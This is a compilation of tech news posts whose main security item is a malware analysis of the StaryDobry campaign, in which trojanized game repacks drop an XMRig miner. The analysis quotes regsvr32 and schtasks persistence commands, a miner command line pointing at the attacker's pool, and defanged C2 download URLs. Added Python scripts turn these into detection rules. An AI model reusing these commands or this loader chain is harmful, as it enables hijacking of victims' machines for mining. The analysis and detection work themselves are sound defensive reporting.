If porting Linux to the NES sounded tough, running an x86 emulator on the console must be pure madness. But in reality, it’s not far off from several projects we’ve seen in the past. If you can boot Linux on an ATmega328 via an emulated RISC-V processor, why not x86 on the NES? In both cases, the only problem is performance: the emulated system ends up running at only a tiny fraction of real-speed, meaning booting a full OS could take hours.
As if things couldn’t get complicated enough, when [decrazyo] tried to boot the x86 emulator ROM, Animal Crossing choked. It turned out (perhaps unsurprisingly) that his ROM was using some features the emulator didn’t support, and was using twice as much RAM as normal. Some re-writes to the emulator sorted out the unsupported features, but there was no getting around the RAM limitation. Ultimately, [decrazyo] had to create a patch for Animal Crossing that doubled the memory of the in-game emulator.
Still with us? So the final setup is a patched Animal Crossing, which is running an in-game NES emulator, which is running a ROM that contains an x86 emulator, which is finally booting a minimal Linux environment at something like 1/64th normal speed. Are we having fun yet?
Despite its age and cutesy appearance, the original Animal Crossing has turned out to be a surprisingly fertile playground for hackers.
youtube.com/embed/OooHTDMUSGY?…
StaryDobry ruins New Year’s Eve, delivering miner instead of presents
Introduction
On December 31, cybercriminals launched a mass infection campaign, aiming to exploit reduced vigilance and increased torrent traffic during the holiday season. Our telemetry detected the attack, which lasted for a month and affected individuals and businesses by distributing the XMRig cryptominer. This previously unidentified actor is targeting users worldwide—including in Russia, Brazil, Germany, Belarus and Kazakhstan—by spreading trojanized versions of popular games via torrent sites.
In this report, we analyze how the attacker evades detection and launches a sophisticated execution chain, employing a wide range of defense evasion techniques.
Kaspersky’s products detect this threat as Trojan.Win64.StaryDobry.*, Trojan-Dropper.Win64.StaryDobry.*, HEUR:Trojan.Win64.StaryDobry.gen.
Initial infection
On December 31, while reviewing our telemetry, we first detected this massive infection. Further investigation revealed that the campaign was initially distributed via popular torrent trackers. Trojanized versions of popular games—such as BeamNG.drive, Garry’s Mod, Dyson Sphere Program, Universe Sandbox, and Plutocracy—were designed to launch a sophisticated infection chain, ultimately deploying a miner implant. These malicious releases were created in advance and uploaded around September 2024.
Although the malicious releases were published by different authors, they were all cracked the same way.
Malicious torrent available for download
Among the compromised installers are popular simulator and sandbox games that require minimal disk space. Below is the distribution of affected users by game as of January 2025:
Infected users per game (download)
These releases, often referred to as “repacks”, were usually distributed in an archive. Let’s now take a closer look at one of the samples. Upon unpacking the archive, we found a trojanized installer.
Technical details
Trojanized installer
After launching the installer (a Windows 32-bit GUI executable), we were welcomed with a GUI screen showing three options: install the game, choose the language, or quit.
This installer was created with Inno Setup. After decompiling the installer, we examined its code and found an interesting functionality.
This code is responsible for extracting the malicious files used in this attack. First, it decrypts unrar.dll using the DECR function, which is a proxy for the RARExtract function within the rar.dll library. RARExtract decrypts unrar.dll using AES encryption with a hard-coded key, cls-precompx.dll. Next, additional files from the archive are dropped into the temporary directory, and execution proceeds to the RARGetDllVersion function within unrar.dll.
Unrar.dll dropper
First of all, the sample runs a series of methods to check if it’s being launched in a debugging environment. These methods search for debugger and sandbox modules injected into processes, and also check the registry and filesystem for certain popular software. If such software is detected, execution immediately terminates.
If the checks are passed, the malware executes cmd.exe to register unrar.dll as a command handler with regsvr32.exe. The sample attempts to query the following list of sites to determine the user’s IP address.
api.myip[.]com
ip-api[.]com
ipapi[.]co
freeipapi[.]com
ipwho[.]is
api.miip[.]my
This is done to identify the infected user’s location, specifically their country. If the malware fails to detect the IP address, it defaults the country code to CNOrBY (meaning “China or Belarus”). Next, the sample sends a request to hxxps://pinokino[.]fun/donate_button/game_id=%s&donate_text=%s with the following substitutions:
- game_id = appended with DST_xxxx, where x represents digits. This value is passed as an argument from the installer; in this campaign, we discovered the variant DST_1448;
- donate_text = appended with the country code.
After this generic country check, the sample collects a fingerprint of the infected machine. This fingerprint consists of various parameters, forming a unique identifier as follows:
mac|machineId|username|country|windows|meminGB|numprocessors|video|game_id
This fingerprint is then encoded using URL-safe Base64 to be sent successfully over the network. Next, the malware retrieves MachineGUID from HKLM\Software\Microsoft\Cryptography and calculates its SHA256 checksum. It then collects 10 characters starting from the 20th position (SHA256(MachineGUID)[20:30]). This hexadecimal sequence is used as the filename for two newly created files: %SystemRoot%\%hash%.dat and %SystemRoot%\%hash%.efi. The first file contains the encoded fingerprint, while the second is an empty decoy. The creation time of the .dat file is spoofed with a random date between 01/01/2015 and 12/25/2021. This file stores the Base64-encoded fingerprint.
After this step, unrar.dll starts preparing to drop the decrypted MTX64.exe to the disk. First, it generates a new filename for the decrypted payload. The malware searches for files in %SystemRoot% or %SystemRoot%\Sysnative. If these directories are empty, the decrypted MTX64.exe is written to the disk as Windows.Graphics.ThumbnailHandler.dll. Otherwise, unrar.dll creates a new file and names it by choosing a random file from the specified directories, taking its name, trimming its extension and appending a random suffix from a predefined list. Besides suffixes, this list contains junk data, most likely added to evade signature-based detection.
For example, if the malware finds a file named msvc140.dll in %SystemRoot%, it removes the extension and appends handler.dll (a random suffix from the list) to the remaining msvc140, resulting in msvc140handler.dll. The malware then writes the decrypted payload to the newly generated file in the %SystemRoot% folder.
After that, the sample opens the encrypted MTX64.exe and decrypts it using AES-128 with a hard-coded key, cls-precompx.dll.
The loader also carries out resource spoofing. First of all, it scans the _res.rc file for DLL property names and values—such as CompanyName, FileVersion and so on—and creates a dictionary of (key, value) pairs. Then it takes a random DLL from the %SystemRoot% folder (exiting if nothing is found), extracts its property values using the VerQueryValueW WinAPI, and replaces the corresponding dictionary values. The resulting resources are embedded into the decrypted MTX64.exe DLL. This file is then saved under the name generated in the previous step. Finally, unrar.dll changes the creation time of the resulting DLL using the same spoofing method as for the fingerprint file.
The dropped DLL is installed using the following command:
cmd.exe /C "cd $system32 && regsvr32.exe /s %dropped_name%.dll"
MTX64
This DLL is based on a public project called EpubShellExtThumbnailHandler, a Windows Shell Extension Thumbnail Handler. This stage completely mimics the legitimate behavior up until the actual thumbnail handling. It gets registered as a .lnk (shortcut) file handler, so whenever a .lnk file is opened, the DLL tries to process its thumbnail. However, here the sample implements its own version of the GetThumbnail interface function, and creates a separate thread to perform its malicious activities.
First, this thread writes the current date and month in dd-mm format to the %TEMP%\time_windows_com.ini file. This stage then retrieves MachineGUID from HKLM\SOFTWARE\Microsoft\Cryptography and calculates SHA256(MachineGUID)[20:30], just like unrar.dll did. After that, it checks %SystemRoot% for the .dat file with this name. The presence of this file confirms that the infection is uninterrupted, prompting the DLL to extract the fingerprint and make a query to the hard-coded threat actors’ domain in the following format, where the UID is the fingerprint’s SHA256 hash.
hxxps://promouno[.]shop/check/uid=%s
The server sends back a JSON that looks like {'code':'reg'}. After this, the DLL makes another query to the server with an additional field, data, which is the Base64-encoded fingerprint (uid remains the same):
hxxps://promouno[.]shop/check/uid=%s&data=%s
Upon receiving this request, the server also sends a JSON. The malware checks its code field, which must be equal to either 322 or 200. If it is, the sample proceeds to extract the MD5 checksum from the flmd field in the same JSON and download the next-stage payload from the following link:
hxxps://promouno[.]shop/dloadm/uid=%s
Next, the sample calculates the MD5 checksum of the received payload (a kickstarter PE file), and checks this hash against the MD5 checksum from the JSON. If they match, the malware parses the PE structure to locate the Export Address Table, retrieves the kickstarter function address, and executes it.
Kickstarter running
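The marker files described for unrar.dll and re-checked by MTX64 can be derived on a suspect host from its own MachineGuid. The triage helper below is an added example, not code from the report: function names, the constructed demo values and the choice to try both UTF-8 and UTF-16LE encodings of the GUID (the report does not state which is hashed) are assumptions, and the slice is taken 0-based on the lowercase hex digest as the [20:30] notation suggests.

```python
import base64
import binascii
import hashlib
import os
import tempfile

# Field order of the fingerprint as given in the report.
FINGERPRINT_FIELDS = ["mac", "machineId", "username", "country", "windows",
                      "meminGB", "numprocessors", "video", "game_id"]
# Files in %TEMP% that the report attributes to later stages.
TEMP_ARTIFACTS = ("time_windows_com.ini", "_cache.binary")


def marker_stems(machine_guid):
    """Candidate file stems: hex SHA256(MachineGUID)[20:30].

    Assumption: the GUID encoding is not documented, so two are tried.
    """
    stems = []
    for encoding in ("utf-8", "utf-16-le"):
        digest = hashlib.sha256(machine_guid.encode(encoding)).hexdigest()
        if digest[20:30] not in stems:
            stems.append(digest[20:30])
    return stems


def decode_fingerprint(blob):
    """Decode a URL-safe Base64 fingerprint into named fields, or None."""
    if isinstance(blob, str):
        blob = blob.encode("ascii", "ignore")
    blob = blob.strip()
    blob += b"=" * (-len(blob) % 4)  # tolerate stripped padding
    try:
        text = base64.urlsafe_b64decode(blob).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    parts = text.split("|")
    if len(parts) != len(FINGERPRINT_FIELDS):
        return None
    return dict(zip(FINGERPRINT_FIELDS, parts))


def scan(machine_guid, system_root, temp_dir):
    """Return findings for the marker files and the temp-directory files."""
    findings = []
    for stem in marker_stems(machine_guid):
        dat = os.path.join(system_root, stem + ".dat")
        efi = os.path.join(system_root, stem + ".efi")
        if os.path.isfile(dat):
            with open(dat, "rb") as handle:
                fields = decode_fingerprint(handle.read())
            findings.append({"path": dat, "kind": "fingerprint",
                             "fields": fields})
        if os.path.isfile(efi):
            findings.append({"path": efi, "kind": "decoy",
                             "empty": os.path.getsize(efi) == 0})
    for name in TEMP_ARTIFACTS:
        path = os.path.join(temp_dir, name)
        if os.path.isfile(path):
            findings.append({"path": path, "kind": "temp"})
    return findings


def read_machine_guid():
    """Windows only: read MachineGuid from the 64-bit registry view."""
    import winreg
    access = winreg.KEY_READ | winreg.KEY_WOW64_64KEY
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Cryptography", 0, access) as key:
        return winreg.QueryValueEx(key, "MachineGuid")[0]


def demo():
    """Run scan() against a constructed directory tree (all values made up)."""
    guid = "11111111-2222-3333-4444-555555555555"
    fingerprint = ("00-11-22-33-44-55|" + guid +
                   "|alice|DE|10|16|8|ExampleGPU|DST_1448")
    encoded = base64.urlsafe_b64encode(fingerprint.encode()).rstrip(b"=")
    with tempfile.TemporaryDirectory() as root:
        sysroot = os.path.join(root, "Windows")
        temp = os.path.join(root, "Temp")
        os.makedirs(sysroot)
        os.makedirs(temp)
        stem = marker_stems(guid)[0]
        with open(os.path.join(sysroot, stem + ".dat"), "wb") as handle:
            handle.write(encoded)
        open(os.path.join(sysroot, stem + ".efi"), "wb").close()
        with open(os.path.join(temp, "time_windows_com.ini"), "w") as handle:
            handle.write("31-12")
        return scan(guid, sysroot, temp)


if __name__ == "__main__":
    if os.name == "nt":
        hits = scan(read_machine_guid(), os.environ["SystemRoot"],
                    os.environ["TEMP"])
    else:
        hits = demo()
    for hit in hits:
        print(hit)
```

Because the creation time of the .dat file is spoofed, a hit should be dated from other evidence rather than from the file's own timestamps.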
Kickstarter
The kickstarter PE has an encrypted blob in its resources. This stage reads the blob and stores it in a C++ vector of bytes.
After that, it chooses a random name for the payload using the same method as for MTX64.exe during the execution of unrar.dll. However, there is a difference: if nothing is found in %SystemRoot% or %SystemRoot%\Sysnative, it chooses Unix.Directory.IconHandler.dll as a default file name. The payload is saved to %appdata\Roaming\Microsoft\Credentials\%InstallDate%\. To locate the InstallDate directory, the DLL retrieves the system installation date from the registry subkey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate.
Then the blob is decrypted using the CryptoPP AES-128 implementation. The key consists of the sequence of bytes from \x00 to \x10. The decrypted contents are written onto the disk. This executable also spoofs its resources using the same method as for MTX64.exe, after which it executes the following command:
schtasks /create /tn %s /tr "regsvr32.exe /s %s" /st 00:00 /du 9999:59 /sc once /ri 1 /f
The first argument is the system installation date, while the second one is the path to the dropped DLL. A scheduled task to register a server with regsvr32.exe is created, using the first argument as its name, with a suppressed warning, set to trigger at 00:00. The loader sends a GET request to the hard-coded address 45.200.149[.]58/conf.txt, implicitly setting the request header to User-Agent: StupidSandwichAgent\r\n.
The loader then waits for a response from the server. If the response begins with act, the sample stops execution after creating the scheduled task. If the response is noactive, meaning the targeted device has not been registered previously, the sample tries to delete itself with the following command, which clears everything in the %temp% directory:
Cleanup
Unix.Directory.IconHandler.dll
Subsequently, Unix.Directory.IconHandler.dll creates a mutex named com_curruser_mttx. If this mutex has already been created, execution stops immediately. Then the DLL searches for the %TEMP%\_cache.binary file. If the sample can’t find it, it downloads the binary directly from 45.200.149[.]58 using a GET 44912.f request, with the same StupidSandwichAgent User-Agent header. This file is written to the temporary directory and then decrypted using AES-128 with the same key consisting of the \x00–\x10 byte sequence.
The sample proceeds to open the current process, look for SeDebugPrivilege in the process token, and adjust it if applicable. We believe this is done to inject code into a newly created cmd.exe process. The author chose the easiest way possible, copying the entire open source injector, including its debug strings:
After injecting the code into the command interpreter, the sample enters an endless loop, continuously checking for taskmgr.exe and procmon.exe in the list of running processes. If either process is detected, the sample is shut down.
Miner implant
This implant is a slightly modified XMRig miner executable. Instead of parsing command-line arguments, it constructs a predefined command line.
xmrig --url=45.200.149[.]58:1448 --algo=rx/0 --user=new-www --donate-level=1 --keepalive --nicehash --background --no-title --pass=x --cpu-max-threads-hint=%d
The last parameter is calculated from the CPU topology: the implant calls the GetSystemInfo API to check the number of processor cores. If there are fewer than 8, the miner does not start. Moreover, the attacker chose to host a mining pool server in their own infrastructure instead of using a public one.
XMRig parses the constructed command line using its built-in functionality. The miner also creates a separate thread to check for process monitors running in the system, using the same method as in the previous stage:
Victims
This campaign primarily targets regular users by distributing malicious repacks. Some organizations were also affected, but these seem to be compromised computers inside corporate infrastructures, rather than direct targets.
Most of the infections have been observed in Russia, with additional cases in Belarus, Kazakhstan, Germany, and Brazil.
Attribution
There are no clear links between this campaign and any previously known crimeware actors, making attribution difficult. However, the use of Russian language in the PDB suggests the campaign may have been developed by a Russian-speaking actor.
Conclusions
StaryDobry tends to be a one-shot campaign. To deliver the miner implant, the actors implemented a sophisticated execution chain that exploited users seeking free games. This approach helped the threat actors make the most out of the miner implant by targeting powerful gaming machines capable of sustaining mining activity. Additionally, the attacker’s use of DoH helped conceal communication with their infrastructure, making it harder to detect and trace the campaign.
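The process and network behaviour described in this report can be turned into a hunting check over process-creation and web-proxy logs. The following is an added example, not part of the original report: the rule names, the event layout and every sample event are constructed, while the command shapes, URL prefixes, hosts and User-Agent string are the ones quoted above.

```python
import re


def refang(indicator):
    """Turn a defanged indicator from the report into a matchable host."""
    host = indicator.replace("[.]", ".")
    return host.replace("hxxps://", "").replace("hxxp://", "")


# Hosts, URL prefixes and User-Agent as quoted (defanged) in the report.
C2_HOSTS = {refang(h) for h in
            ("promouno[.]shop", "pinokino[.]fun", "45.200.149[.]58")}
C2_PATH_PREFIXES = ("/check/uid=", "/dloadm/uid=", "/donate_button/game_id=")
LOADER_USER_AGENT = "StupidSandwichAgent"

# A rule fires only when every one of its patterns matches the command line.
PROCESS_RULES = {
    "regsvr32_via_cmd": [
        r'\bcmd(\.exe)?\s+/c\s+"?cd\s+\S+\s*&&\s*'
        r'regsvr32(\.exe)?\s+/s\s+\S+\.dll',
    ],
    "schtasks_regsvr32_task": [
        r"\bschtasks(\.exe)?\s+/create\b",
        r'/tr\s+"?regsvr32(\.exe)?\s+/s\b',
        r"/du\s+9999:59\b",
        r"/ri\s+1\b",
    ],
}


def match_process(cmdline):
    """Return the names of the process rules the command line satisfies."""
    return [name for name, patterns in PROCESS_RULES.items()
            if all(re.search(p, cmdline, re.IGNORECASE) for p in patterns)]


def match_http(host, path, user_agent):
    """Return the network rules an HTTP request record satisfies."""
    hits = []
    if host.lower() in C2_HOSTS:
        hits.append("known_c2_host")
    if path.lower().startswith(C2_PATH_PREFIXES):
        hits.append("c2_url_path")
    if LOADER_USER_AGENT.lower() in user_agent.lower():
        hits.append("loader_user_agent")
    return hits


def hunt(events):
    """Map event index -> list of rule names, for events with any hit."""
    results = {}
    for index, event in enumerate(events):
        if event["type"] == "process":
            hits = match_process(event["cmdline"])
        else:
            hits = match_http(event["host"], event["path"],
                              event.get("user_agent", ""))
        if hits:
            results[index] = hits
    return results


# Constructed sample events: four matching the report, three benign.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline":
        r'cmd.exe /C "cd C:\Windows\system32 && '
        r'regsvr32.exe /s msvc140handler.dll"'},
    {"type": "process", "cmdline":
        r'schtasks /create /tn 1650000000 /tr "regsvr32.exe /s '
        r'C:\Users\alice\AppData\Roaming\Microsoft\Credentials'
        r'\1650000000\Unix.Directory.IconHandler.dll" '
        r'/st 00:00 /du 9999:59 /sc once /ri 1 /f'},
    {"type": "http", "host": "45.200.149.58", "path": "/conf.txt",
     "user_agent": "StupidSandwichAgent"},
    {"type": "process", "cmdline":
        r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"type": "process", "cmdline":
        r'schtasks /create /tn Backup /tr "C:\Tools\backup.exe" '
        r'/sc daily /st 02:00'},
    {"type": "http", "host": "example.org", "path": "/check/status",
     "user_agent": "Mozilla/5.0"},
    {"type": "http", "host": "promouno.shop",
     "path": "/check/uid=0123abcd&data=QUJD", "user_agent": ""},
]

if __name__ == "__main__":
    for index, rules in hunt(SAMPLE_EVENTS).items():
        print(index, rules)
```

The URL-path rule only sees requests to the hxxps endpoints where TLS is inspected; elsewhere the host match depends on whatever hostname the proxy or firewall records.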
Indicators of compromise
File hashes
Domains and IPs
45.200.149[.]58
45.200.149[.]146
45.200.149[.]148
hxxps://promouno[.]shop
hxxps://pinokino[.]fun
Space Monitor Points Out Celestial Objects
Logically we understand that the other planets in the solar system, as well as humanity’s contributions to the cosmos such as the Hubble Space Telescope and the International Space Station, are zipping around us somewhere — but it can be difficult to conceptualize. Is Jupiter directly above your desk? Is the ISS currently underneath you?
If you’ve ever found yourself wondering such things, you might want to look into making something like Space Monitor. Designed by [Kevin Assen], this little gadget is able to literally point out the locations of objects in space. Currently it’s limited to the ISS and Mars, but adding new objects to track is just a matter of loading in the appropriate orbital data.
In addition to slewing around its 3D printed indicator, the Space Monitor also features a round LCD that displays the object currently being tracked, as well as the weather. Reading through the list of features and capabilities of the ESP32-powered device, we get the impression that [Kevin] is using it as a sort of development platform for various concepts. Features like remote firmware updates and the ability to point smartphones to the device’s configuration page via on-screen QR aren’t necessarily needed on a personal-use device, but it’s great practice for when you do eventually send one of your creations out into the scary world beyond your workbench.
If you’re interested in something a bit more elaborate, check out this impressive multi-level satellite tracker we covered back in 2018.
youtube.com/embed/6-wM_a_eX-g?…
Meta Revolutionizes the Web: Waterworth, the 50,000 km Submarine Cable!
Meta has announced the largest submarine cable project ever undertaken, Project Waterworth, which will span five continents.
The multibillion-dollar, multi-year project was announced on the company’s blog. Meta says it will strengthen the reach and reliability of global digital infrastructure by opening three new oceanic corridors with the high capacity needed to drive artificial intelligence technologies.
According to the company, artificial intelligence is radically changing various areas of life, and Meta is committed to being at the forefront of this technological process. Project Waterworth will provide access to advanced technologies for millions of people around the world.
According to Meta’s vice president of network engineering, Ghai Nagarajan, and its head of global network investments, Alex-Handra Aime, this will be the largest submarine cable project in the company’s history. It will be more than 50,000 km long, which exceeds the circumference of the Earth.
The submarine network will connect the United States, India, Brazil, South Africa and other key regions, promoting economic cooperation, digital inclusion and technological development. In particular, the blog stresses that Project Waterworth will accelerate the implementation of India’s digital strategy.
Over the past ten years Meta has taken part in developing more than 20 submarine cables, deploying systems with 24 fiber pairs instead of the standard 8-16. The new project will continue this trend, creating the longest high-capacity submarine network.
The company also plans to use innovative cable-laying techniques at depths of up to 7 km and improved coastal burial techniques to minimize the risk of damage from ship anchors and other hazards.
In addition to Project Waterworth, Meta is forming a new division within Reality Labs that will focus on developing humanoid robots powered by artificial intelligence. Andrew Bosworth, Meta’s CTO, said in a memo that the new group will work on building consumer robots using the capabilities of the Llama model.
Meta also plans to expand its retail presence by opening its own stores, similar to the Meta Lab Store, which opened in Los Angeles in November.
The article “Meta Revolutionizes the Web: Waterworth, the 50,000 km Submarine Cable!” comes from il blog della sicurezza informatica.
Apple Chooses Alibaba’s Tongyi Qianwen AI to Power Siri in China
GameLook reports that after almost a year of waiting, according to the latest news from foreign media, Apple has submitted an application to work with Alibaba on developing a large artificial intelligence model and is awaiting approval from the national government. In other words, Apple Intelligence in China will in future provide users with AI services based on Alibaba’s Tongyi Qianwen model.
Apple’s market share in China has been eroded by domestic brands in recent years: according to the latest IDC data, Apple’s market share in China will be 15.6% in 2024, down two percentage points from 2023.
But since Apple is one of the companies with the greatest “fantasy space” and the highest user value in the world, whoever manages to work with it on artificial intelligence will undoubtedly be able to seize the initiative in the AI era of the mobile ecosystem.
In the main overseas markets, Apple’s partner for this service is currently OpenAI’s ChatGPT.
As Apple’s intelligent services in China begin to take shape, GameLook, as a media outlet, is also asking whether all this is useful for ordinary Chinese users and what it means. First of all, regarding the news of Alibaba’s cooperation with Apple, many people’s first question is probably: why Alibaba and Tongyi Qianwen?
It should be noted that Alibaba’s presence is not the strongest in the consumer (2C) market or in the AI race. After all, ByteDance’s Doubao (whose DAU reaches 17 million) is ahead, as is DeepSeek, which has recently been in the spotlight and has surpassed 40 million daily active users. In fact, according to foreign media reports, Apple chose Alibaba after evaluating the models developed by Tencent, ByteDance, Alibaba and DeepSeek.
According to GameLook, Alibaba, as a cloud service provider and a leading company in the domestic Internet sector, can provide more stable and comprehensive services when dealing with very large customers such as Apple, particularly in the area of government compliance, where Alibaba also has considerable experience.
In this respect, newcomers such as DeepSeek are clearly at a disadvantage. It cannot be that domestic Apple users call on Siri and the reply they get is “The server is busy, please try again later”. Secondly, Alibaba’s Tongyi Qianwen has always been one of the most capable large-scale AI models in China. Besides the flagship model, Alibaba’s Tongyi Qianwen, like DeepSeek, has always remained open source for the community and therefore enjoys strong influence in the global open source community.
According to the latest data officially published by Alibaba, its newest model, Qwen2.5-Max, has achieved results comparable to or even better than those of DeepSeek, Llama, GPT-4o and other models in the most widely used current benchmark tests for large models.
The article “Apple Chooses Alibaba’s Tongyi Qianwen AI to Power Siri in China” comes from il blog della sicurezza informatica.
Pro-Russian Hackers DXPLOIT Hit the Research Italy Site with a DDoS Attack
The pro-Russian hackers of the DXPLOIT group have claimed responsibility for a DDoS attack on the Research Italy website, the official portal of the Italian Ministry of University and Research (researchitaly.mur.gov.it/). The action was announced through their communication channel, where they also published evidence of the attack in the form of a check-host report showing that the site is unreachable.
According to DXPLOIT, the Italian government site was taken offline by a Distributed Denial of Service (DDoS) attack, a technique that overloads servers with a huge volume of requests until they become unusable. The message published by the group included evidence in the form of a check-host report confirming the site’s unavailability. They also shared an IP address (130.186.10.36) linked to the attack.
Screenshots shared by the hackers show the site returning a 502 Bad Gateway error, a typical sign of an overloaded server or of a misconfiguration caused by a high volume of malicious traffic.
This article was written using the platform of Recorded Future, a strategic partner of Red Hot Cyber and a world leader in cyber threat intelligence, which provides advanced analysis to identify and counter malicious activity in cyberspace.
DDoS attacks: a growing threat
DDoS attacks are one of the methods most used by hacktivists to hit institutional and government websites, especially in periods of geopolitical tension. In recent years, several pro-Russian groups have targeted European and NATO countries with coordinated attack campaigns.
DXPLOIT is not the first group to hit Italian targets. Before their attack, other hackers such as NoName057(16) repeatedly targeted Italy’s digital infrastructure, including ministries, airports and critical companies.
These attacks are part of a broader cyberwarfare strategy in which groups of hacktivists and cybercriminals try to destabilize governments, companies and institutions through digital sabotage.
Italy increasingly a target of cybercrime
In recent months, Italy has been at the center of numerous cyberattacks by groups linked to Russia, with targets ranging from public administration to critical infrastructure. Institutions are working to strengthen their defenses, but the threat remains high, with the possibility of new attacks in the future.
The DXPLOIT attack is only the latest in a long series. It remains to be seen how the Italian authorities will respond and whether more effective countermeasures will be adopted to protect national IT systems.
The article “Pro-Russian Hackers DXPLOIT Hit the Research Italy Site with a DDoS Attack” comes from il blog della sicurezza informatica.
Get Ready For KiCAD 9!
Rev up your browsers, package managers, or whatever other tool you use to avail yourself of new software releases, because the KiCAD team have announced that barring any major bugs being found in the next few hours, tomorrow should see the release of version 9 of the open source EDA suite. Who knows, depending on where you are in the world that could have already happened when you read this.
Skimming through the long list of enhancements brought into this version there’s one thing that strikes us: how this is now a list of upgrades and tweaks to a stable piece of software rather than essential features bringing a rough and ready package towards usability. There was a time when using KiCAD was a frustrating experience of many quirks and interface annoyances, but successive versions have improved it beyond measure. We would pass comment that we wished all open source software was as polished, but the fact is that much of the commercial software in this arena is not as good as this.
So head on over and kick the tires on this new KiCAD release, assuming that it passes those final checks. We look forward to the community’s verdict on it.
Integrated Micro Lab Keeps Track of Ammonia in the Blood
We’ve all got our health-related crosses to bear, and even if you’re currently healthy, it’s only a matter of time before entropy catches up to you. For [Markus Bindhammer], it caught up to him in a big way: liver disease, specifically cirrhosis. The disease has a lot of consequences, none of which are pleasant, like abnormally high ammonia concentration in the blood. So naturally, [Markus] built an ammonia analyzer to monitor his blood.
Measuring the amount of ammonia in blood isn’t as straightforward as you think. Yes, there are a few cheap MEMS-based sensors, but they tend to be good only for qualitative measurements, and other solid-state sensors that are more quantitative tend to be pretty expensive since they’re mostly intended for industrial applications. [Marb]’s approach is based on the so-called Berthelot method, which uses a two-part reagent. In the presence of ammonia (or more precisely, ammonium ions), the reagent generates a dark blue-green species that absorbs light strongly at 660 nm. Measuring the absorbance at that wavelength gives an approximation of the ammonia concentration.
[Marb]’s implementation of this process uses a two-stage reactor. The first stage heats and stirs the sample in a glass tube using a simple cartridge heater from a 3D printer head and a stirrer made from a stepper motor with a magnetic arm. Heating the sample volatilizes any ammonia in it, which mixes with room air pumped into the chamber by a small compressor. The ammonia-laden air moves to the second chamber containing the Berthelot reagent, stirred by another stepper-powered stir plate. A glass frit diffuses the gas into the reagent, and a 660-nm laser and photodiode detect any color change. The video below shows the design and construction of the micro lab along with some test runs.
We wish [Markus] well in his journey, of course, especially since he’s been an active part of our community for years. His chemistry-related projects run the gamut from a homebrew gas chromatograph to chemical flip flops, with a lot more to boot.
A Forgotten Consumer PC Becomes a Floating Point Powerhouse
[Michael Wessel] found some of his old DOS 3D graphics software and tried to run it on an 8088 PC. The tale of adding an 8087 co-processor to speed up the rendering was anything but straightforward, resulting in a useful little project.
There was a point around the end of the 1980s when the world of PCs had moved on to the 386, but the humble 8086 and 8088 hung around at the consumer end of the market. For Europeans that meant a variety of non-standard machines with brand names such as Amstrad and Schneider, and even surprisingly, later on Sinclair and Commodore too.
Of these the Schneider Euro PC was an all-in-one design reminiscent of an Amiga or Atari ST, packing a serviceable 8088 PC with a single 3.5″ floppy drive. A cheap machine like this was never thought to need an 8087, and lacked the usual socket on the motherboard, so he made a small PCB daughter board for the 8088 socket with space for both chips.
It’s a surprisingly simple circuit, as obviously the two chips were meant to exist together. It certainly had the desired effect on his frame rate, though we’re not sure how many other Euro PC users will need it. It does make us curious though, as to how quickly a modern microcontroller could emulate an 8087 for an even faster render time. Meanwhile if you’re curious about the 8087, of course [Ken Shirriff] has taken a look at it.
Probably The Most Esoteric Commodore 64 Magazine
The world of computer enthusiasts has over time generated many subcultures and fandoms, each of which has in turn spawned its own media. [Intric8] has shared the tale of his falling down a rabbit hole as he traced one of them, a particularly esoteric disk magazine for the Commodore 64. The disks are bright yellow, and come with intricate home-made jackets and labels. Sticking them into a 1541 drive does nothing, because these aren’t standard fare, instead they require GEOS and a particularly upgraded machine. They appear at times in Commodore swap meets, and since they formed a periodical there are several years’ worth to collect that extend into the 2000s, long after the heyday of the 64.
Picking up nuggets of information over time, he traces them to Oregon, and the Astoria Commodore User Group, and to [Lord Ronin], otherwise known as David Mohr. Sadly the magazine ended with his death in 2009, but until then he produced an esoteric selection of stories, adventure games, and other software for surely one of the most exclusive computer clubs in existence. It’s a fascinating look into computer culture from before the Internet, even though by 2009 the Internet had well and truly eclipsed it, when disks like these were treasured for the information they contained. So if you find any of these yellow Penny Farthing disks, make sure that they or at least their contents are preserved.
Surprisingly, this isn’t the only odd format disk magazine we’ve seen.
Measuring Local Variances in Earth’s Magnetic Field
Although the Earth’s magnetic field is reliable enough for navigation and is also essential for blocking harmful solar emissions and for improving radio communications, it’s not a uniform strength everywhere on the planet. Much like how inconsistencies in the density of the materials of the planet can impact the local gravitational force ever so slightly, so too can slight changes impact the strength of the magnetic field from place to place. And it doesn’t take too much to measure this impact on your own, as [efeyenice983] demonstrates here.
To measure this local field strength, the first item needed is a working compass. With the compass aligned to north, a magnet is placed with its poles aligned at a right angle to the compass. The deflection angle of the needle is noted for varying distances of the magnet, and with some quick math the local field strength of the Earth’s magnetic field can be calculated based on the strength of the magnet and the amount of change of the compass needle when under its influence.
Using this method, [efeyenice983] found that the Earth’s magnetic field strength at their location was about 0.49 Gauss, which is well within the 0.25 to 0.65 Gauss range that is typically found on the planet’s surface. Not only does the magnetic field strength vary with location, it’s been generally decreasing in strength on average over the past century or so as well, and the poles themselves aren’t stationary either. Check out this article which shows just how much the poles have shifted over the last few decades.
Keebin’ with Kristina: the One with the Cutting Board Keyboard
Doesn’t this look fantastic? Hard to believe it, but the base of this keyboard began life as a cutting board, and there’s a gallery to prove it. This is actually [androidbrick]’s second foray into this type of upcycling.
This time, [androidbrick] used a FiiO KB3 and replaced the bottom half of the plastic shell with a hand-routed kitchen cutting board. The battery has been disabled and it works only in wired mode, which is fine with me, because then you get to use a curly cord if you want.
Image by [androidbrick] via reddit
The switches are mostly Gateron EF Currys, though [androidbrick] left some of the original Gateron G Pro 3.0 on the stabilized keys just for comparison. As you might imagine, the overall sound is much deeper with a wooden bottom. You can check out the sound test on YouTube if you’d like, though it’s pretty quiet, so turn it up.
Those keycaps look even nicer from top-down, which you’ll see in the sound test video linked above. Just search ‘JCM MOA GMK’ on Ali and you’ll find them in a bunch of colorways for around $20. Apparently, [androidbrick] was saving them for months, just waiting for this build.
Via reddit
Why You Should Always Re-flash New Keyboards
About a month ago, [Artistic-Art-3985] bought the cheapest Corne available on Ali and posted a breakdown of the security and electronics.
Image by [Artistic-Art-3985] via reddit
The firmware turned out to be different from the current release in the original repo, which of course is a concern. When asked about it, the seller went silent. So did some other sellers when asked these types of questions.
